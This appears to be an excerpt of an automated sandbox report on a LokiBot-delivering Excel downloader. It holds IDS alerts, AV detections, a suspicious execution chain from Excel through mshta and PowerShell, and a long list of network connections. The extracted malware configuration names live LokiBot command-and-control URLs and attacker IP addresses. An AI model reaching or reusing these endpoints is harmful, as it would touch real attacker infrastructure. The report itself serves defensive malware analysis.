2024-10-24T21:24:15.731889+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-24T21:24:17.099666+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-24T21:24:18.288921+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-24T21:24:19.585023+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49205	94.156.177.220	80	TCP

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:23:11.639661+0200	2049038	1	A Network Trojan was detected	172.217.16.193	443	192.168.2.22	49169	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:23:25.857786+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49171	94.156.177.220	80	TCP
2024-10-24T21:23:27.167849+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49172	94.156.177.220	80	TCP
2024-10-24T21:23:29.882996+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49173	94.156.177.220	80	TCP
2024-10-24T21:23:31.085554+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49174	94.156.177.220	80	TCP
2024-10-24T21:23:32.718723+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49175	94.156.177.220	80	TCP
2024-10-24T21:23:34.319094+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-24T21:23:36.550346+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-24T21:23:37.888749+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-24T21:23:39.094384+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-24T21:23:40.351612+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-24T21:23:41.637884+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-24T21:23:42.903713+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-24T21:23:44.172011+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-24T21:23:45.422327+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-24T21:23:46.883325+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-24T21:23:48.406792+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-24T21:23:49.566653+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-24T21:23:50.751878+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-24T21:23:51.961137+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-24T21:23:53.505309+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-24T21:23:55.726103+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-24T21:23:56.972372+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-24T21:23:59.275066+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-24T21:24:00.662976+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-24T21:24:01.927481+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-24T21:24:03.260935+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-24T21:24:04.916021+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-24T21:24:07.357975+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-24T21:24:08.611452+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-24T21:24:10.055685+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-24T21:24:14.427514+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-24T21:24:15.731889+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-24T21:24:17.099666+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-24T21:24:18.288921+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-24T21:24:19.585023+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.220	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 16.2.AddInProcess32.exe.400000.0.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u00c6\u00cb\u00d1\u00ce\u00ca\u00c9\u00d1\u00ce\u00c8\u00c8\u00d1\u00cd\u00cd\u00cf\u00d0\u008c\u0096\u0092\u008f\u0093\u009a\u00d0\u0099\u0096\u0089\u009a\u00d0\u0099\u008d\u009a\u00d1\u008f\u0097\u008f"]}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx

ReversingLabs: Detection: 36%

Machine Learning detection for sample

Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 5.159.62.244:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.159.62.243:443 -> 192.168.2.22:49165 version: TLS 1.2

Source:	Binary string: AddInProcess32.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000010.00000002.621438972.0000000000B72000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.pdbhP source: powershell.exe, 00000006.00000002.452706193.00000000038C8000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.pdb source: powershell.exe, 00000006.00000002.452706193.00000000038C8000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000010.00000002.621438972.0000000000B72000.00000020.00000001.01000000.0000000B.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 16_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

16_2_00403D74

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	DNS query: name: mpa.li
Source: global traffic	DNS query: name: mpa.li
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.usercontent.google.com

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
